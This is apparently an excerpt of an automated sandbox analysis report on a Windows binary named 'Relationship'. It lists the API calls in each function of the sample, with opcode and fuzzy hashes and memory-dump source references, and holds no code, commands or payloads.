                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5a4e31efe6d3739f55f6b59f41d31b317c34b5bcdc24f2935c3beefe917e6f4b
                                                                                                                                                                                                                                                                            • Instruction ID: c9037236ac18c2c23e4d75f6ef7ff62bd090140f8e7eedf8479b6e3ce19d96f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a4e31efe6d3739f55f6b59f41d31b317c34b5bcdc24f2935c3beefe917e6f4b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F501F732611272ABCB229B79BC44F5A3F58BF15B717200660FA16D7580C728DF01C7E4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BA8B
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BAB0
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BABA
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BAED
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                            • Opcode ID: a395d378a1fef8ee121ae307afa6cd13a5f504d2a1872e1bcfade789457f4bfd
                                                                                                                                                                                                                                                                            • Instruction ID: 41d784c391374ecb301df89ef9af9772edd4f8e2e2b2c2d290feb88a197c6332
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a395d378a1fef8ee121ae307afa6cd13a5f504d2a1872e1bcfade789457f4bfd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9115E35C00619E7CF00EFA5E9497EEBF78FF09712F104095E941B2190DB305A94DB69
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C8888E
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C888A6
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C888CA
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C888E5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1680cd8ea7eff47de4f94d722fcbd2a3b1824a942275231ae76794b5fd33e5db
                                                                                                                                                                                                                                                                            • Instruction ID: 07aa39311ff3bd2513ef5296befed51ad8f00aa2fa5f4f4e1e78ebb1f00007c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1680cd8ea7eff47de4f94d722fcbd2a3b1824a942275231ae76794b5fd33e5db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 501140B9D0020DAFDB41DFA8C884AEEBBB5FB08314F508166E925E2650E735AA54CF54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C53712
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53723
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5372A
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C53731
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                            • Opcode ID: 90f4d55dab33082845d0793c669be2c542329e9934021382cd9b0bc6e973ccc5
                                                                                                                                                                                                                                                                            • Instruction ID: d5d8c383155af96b3c0174699b49ddaf4f17d5d5e4b9fd4762f04c33f6559e08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f4d55dab33082845d0793c669be2c542329e9934021382cd9b0bc6e973ccc5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDE06DB1501268BADA2017A2AC4DFEF7F6CDF46BF2F000015F506D20C0EAA08A84C3B8
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1F87
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1F96
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: BeginPath.GDI32(?), ref: 00BF1FAD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1FD6
                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C892E3
                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00C892F0
                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00C89300
                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00C8930E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                            • Opcode ID: b8437c54ca0b64782bad20d1c401e1c1ee4eac300cdb3bfa642e2a88673148c4
                                                                                                                                                                                                                                                                            • Instruction ID: 9e6a3919861a52ea4841ae07eeaf3dee1cbe9afb2b29bf329a0542fd512b5b79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8437c54ca0b64782bad20d1c401e1c1ee4eac300cdb3bfa642e2a88673148c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF05E31005259BBDB126F54AC0EFDE3F6AAF0A324F048000FA16250E1C77556219BA9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 00BF21BC
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00BF21C6
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00BF21D9
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00BF21E1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                            • Opcode ID: 96afa6cf17586bb97e74cfb3358aa5d3316c4b8ee314bf61b1ea0d62a85f3164
                                                                                                                                                                                                                                                                            • Instruction ID: e3236cd925fa4d8594ca95cc2a11fca11de94fcf3726aef0be5110e0c6d78ae4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96afa6cf17586bb97e74cfb3358aa5d3316c4b8ee314bf61b1ea0d62a85f3164
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56E06D31240680AEDB216B74AC0DBEC3B61AF12336F04821AF7BB980E0C77286449B15
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C4EC36
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C4EC40
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4EC60
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C4EC81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7744ecd0f8715b5e1bebe27724f85c36992b5cae20d77dd923d8edf68593d6bc
                                                                                                                                                                                                                                                                            • Instruction ID: 9388c74363ec4a362a89f8b6b45d6eba65baa64d19a1eb0ab0e658c27f16d6bc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7744ecd0f8715b5e1bebe27724f85c36992b5cae20d77dd923d8edf68593d6bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBE09A75800209EFCB41AFA1D948B6DBBF5FF58311F108859F95AE3290D7785941EF14
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C4EC4A
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C4EC54
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4EC60
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C4EC81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                            • Opcode ID: eb2eb5da5b682fec0836f70a9ec93245895ff0dcfb758d8ec38f4699e7e94fcc
                                                                                                                                                                                                                                                                            • Instruction ID: 91465b1d7de00ea12f0fe2bf655fcab86763d545b1dd5c2c1da664d9275817b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb2eb5da5b682fec0836f70a9ec93245895ff0dcfb758d8ec38f4699e7e94fcc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACE09A75C00209EFCB519FA0D948B6DBBB5AF58311B108859F95AE3290D7785901DF14
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C65919
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                            • Opcode ID: 9e088f6ee9b6a8272a8a3ad8c0e24b700badfbe1882d02926fe52ea651d3ae38
                                                                                                                                                                                                                                                                            • Instruction ID: 3eb5c4cabbdb06aad6ef6565f0923a8149b957c9e3aee7cc327bfc990015c5a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e088f6ee9b6a8272a8a3ad8c0e24b700badfbe1882d02926fe52ea651d3ae38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36916F75A00604DFCB24DF54C4D4EAABBF1AF45314F288099E8559F3A2C771EE86DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00C1E67D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                            • Opcode ID: fd2cbf4eb2e15b03f759d9f95835d1d871f4ef8a4234d3fc23e52538b5dfbaab
                                                                                                                                                                                                                                                                            • Instruction ID: b6f0d83d26957c53e3b2dd428e8b0d2cab1bd69b4681ed324bc26dbceb070577
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd2cbf4eb2e15b03f759d9f95835d1d871f4ef8a4234d3fc23e52538b5dfbaab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A51CF71E0A106D6D7117714ED013EE3BA0AB51700F704D59F8B1C26E8DF358EEABA86
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                            • Opcode ID: 668d695f2df60d46a13d618b54ae4665ec988c5361e279c8f43dc188ea445ca3
                                                                                                                                                                                                                                                                            • Instruction ID: c37fd1f5f451340876dbef52f1593848f47dd1673104fc1862156d93d3b5956a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 668d695f2df60d46a13d618b54ae4665ec988c5361e279c8f43dc188ea445ca3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39512031A0434ADFDF25DF28C451ABE7BA4BF15310F644059F9A19B2D0DB349E8ACB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C0F6DB
                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C0F6F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 5cbee378d825dea020b036054a29674b7b6c1de09e81751e9666861d36dbaee3
                                                                                                                                                                                                                                                                            • Instruction ID: c076f503be96050fed7609c61a8f5c370333e60c9509d5b01ca94bc4de981595
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cbee378d825dea020b036054a29674b7b6c1de09e81751e9666861d36dbaee3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 925139714087489BD320AF14DC86BBFB7E8FF95704F81489DF2D9421A1DB708569CB66
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                            • Opcode ID: 30f4a587a0f18e95ae0b095c4f39d4ea3026f60df2d2cb748623b06c6881fcd6
                                                                                                                                                                                                                                                                            • Instruction ID: cd6ce7057af43966fae2532f150350801c72f3375d99b8a3b8277502e98595b0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30f4a587a0f18e95ae0b095c4f39d4ea3026f60df2d2cb748623b06c6881fcd6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641E271A006199FCB04DFA5C8829FEBBF5FF58324F108069E51AA7252E7709E81CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C6DB75
                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C6DB7F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
